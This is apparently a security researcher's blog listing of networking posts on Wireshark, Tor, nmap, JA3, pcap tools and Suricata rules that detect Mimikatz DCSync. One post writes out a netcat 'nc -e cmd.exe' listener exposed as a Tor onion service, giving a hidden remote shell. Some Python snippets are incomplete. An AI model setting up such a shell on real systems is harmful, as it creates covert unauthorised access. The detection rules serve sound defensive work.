Didier Stevens

Tuesday 27 February 2018

Wireshark Comments

Filed under: Networking,Wireshark — Didier Stevens @ 0:00

For NVISO, I’m providing Wireshark training at BruCON Spring 2018: Wireshark and Lua Programming.

In the following video, I show how to add comments to packets and capture files in Wireshark:

Monday 26 February 2018

Quickpost: Using nmap With Tallow (Tor proxy)

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Here’s how I used nmap with Tallow on Windows, a transparent Tor proxy:

ICMP is not supported by the Tor network (hence -Pn) neither SYN scanning (hence TCP scanning -sT).

Flag “Force web-only” blocks all ports except 80 and 443, hence why port 22 is filtered.


Quickpost info

Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret of course, I show it here for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Remark that this does not work with version 7.60, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.


Quickpost info

Saturday 3 February 2018

Quickpost: Code To Connect To Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 20:16

I wanted a program to connect to Tor Onion Services (aka hidden services). It’s written in Python and uses the PySocks module:

import socks

PROXYHOST = 'localhost'

HOST = 'duskgytldkxiuqc6.onion'
PORT = 80

print('[*] Creating socket')
oSocket = socks.socksocket()

print('[*] Setting SOCKS5 proxy %s %s' % (PROXYHOST, PROXYPORT))
oSocket.set_proxy(socks.SOCKS5, PROXYHOST, PROXYPORT)

print('[*] Connecting %s %s' % (HOST, PORT))
oSocket.connect((HOST, PORT))

print('[*] Sending')
data = ['GET / HTTP/1.1', 'Host: %s' % HOST]
data = '\r\n'.join(data) + '\r\n\r\n'

print('[*] Receiving')

print('[*] Closing')

print('[*] Done')

In line 13 I configure the socksocket to use Tor as a SOCKS5 proxy (Tor needs to be running).

From that line on, the code is the same as for the build-in socket module:

import socket

print('[*] Creating socket')
oSocket = socket.socket()


In this first example I build an HTTP GET request, that is something that doesn’t have to be done when module requests is used:

import requests

PROXYHOST = 'localhost'

HOST = 'duskgytldkxiuqc6.onion'

url = 'http://' + HOST
print('[*] Requesting %s' % url)
print(requests.get(url, proxies={'http': 'socks5h://%s:%s' % (PROXYHOST, PROXYPORT), 'https': 'socks5h://%s:%s' % (PROXYHOST, PROXYPORT)}).text)

print('[*] Done')

Quickpost info

Sunday 8 October 2017

Quickpost: Mimikatz DCSync Detection

Filed under: Hacking,Networking,Quickpost — Didier Stevens @ 22:40

Benjamin Delpy/@gentilkiwi’s Brucon workshop on Mimikatz inspired me to resume my work on detecting DCSync usage inside networks.

Here are 2 Suricata rules to detect Active Directory replication traffic between a domain controller and a domain member like a workstation (e.g. not a domain controller):

alert tcp !$DC_SERVERS any -> $DC_SERVERS any (msg:"Mimikatz DRSUAPI"; flow:established,to_server; content:"|05 00 0b|"; depth:3; content:"|35 42 51 e3 06 4b d1 11 ab 04 00 c0 4f c2 dc d2|"; depth:100; flowbits:set,drsuapi; flowbits:noalert; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000001; rev:1;)
alert tcp !$DC_SERVERS any -> $DC_SERVERS any (msg:"Mimikatz DRSUAPI DsGetNCChanges Request"; flow:established,to_server; flowbits:isset,drsuapi; content:"|05 00 00|"; depth:3; content:"|00 03|"; offset:22 depth:2; reference:url,blog.didierstevens.com; classtype:policy-violation; sid:1000002; rev:1;)

Variable DC_SERVERS should be set to the IP addresses of the domain controllers.

The first rule will set a flowbit (drsuapi) when DCE/RPC traffic is detected to bind to the directory replication interface (DRSUAPI).

The second rule will detect a DCE/RPC DsGetNCChanges request if the flowbit drsuapi is set.


These rules were tested in a test environment with normal traffic between a workstation and a domain controller, and with Mimikatz DCSync traffic. They were not tested in a production network.

Quickpost info

Wednesday 23 August 2017

Wireshark: Follow Streams

Filed under: Networking,Wireshark — Didier Stevens @ 0:00

Following streams (like TCP connections) in Wireshark provides a different view on network traffic: in stead of individual packets, one can see data flowing between client & server.

There is a difference between following a TCP stream and an HTTP stream. For example, if the data downloaded from the webserver is gzip compressed, following the TCP stream will display the compressed data, while following the HTTP stream will display the decompressed data.

I illustrate this in the following video:

Sunday 30 July 2017

Quickpost: Trying Out JA3

Filed under: Networking,Quickpost — Didier Stevens @ 21:19

I tried out JA3 (a Python program to fingerprint TLS clients) with a 1GB pcap file from my server. It was fast (less than 1 minute), but I had to add some error handling to skip packets it would crash on.

I did not identify a lot of client HELLO packets with the JSON fingerprint database: around 5%.


Quickpost info

Monday 7 September 2015

Wireshark Wifi and Lua Training – Brucon 2015

Filed under: Didier Stevens Labs,Networking,WiFi — Didier Stevens @ 0:00

I teach a 2 day training “Wireshark Wifi and Lua Training” at Brucon. More details here.

Tuesday 16 June 2015

Metasploit Meterpreter Reverse HTTPS Snort Rule

Filed under: Networking — Didier Stevens @ 22:00

Emerging Threats and Snort released my Snort rule to detect Metasploit Meterpreter Reverse HTTPS traffic.

More details about the rule in an upcoming blogpost.

Tuesday 9 June 2015


Filed under: My Software,Networking — Didier Stevens @ 0:00

pcap-rename.py is a program to rename pcap files with a timestamp of the first packet in the pcap file.

The first argument is a template of the new filename. Use %% as a placeholder for the timestamp. Don’t forget the .pcap extension.

The next arguments are the pcap files to be renamed.
You can provide one or more pcap files, use wildcards (*.pcap) and use @file.
@file: file is a text file containing filenames. Each file listed in the text file is processed.

Example to rename pcap files:
pcap-rename.py server-%%.pcap *.pcap

Renamed: capture1.pcap -> server-20140416-184037-926493.pcap
Renamed: capture2.pcap -> server-20140417-114252-700036.pcap
Renamed: capture3.pcap -> server-20140419-052202-911011.pcap
Renamed: capture4.pcap -> server-20140424-065625-868672.pcap

Use option -n to view the result without actually renaming the pcap files.

This program does not support .pcapng files (yet).

pcap-rename_V0_0_1.zip (https)
MD5: 5F844411E178909970BC21349A629438
SHA256: AB706DB3470A915A3031EC248B8DAF83C08F42DBF6AC2EACB1A2DB2493B0AEEE

Next Page »

Blog at WordPress.com.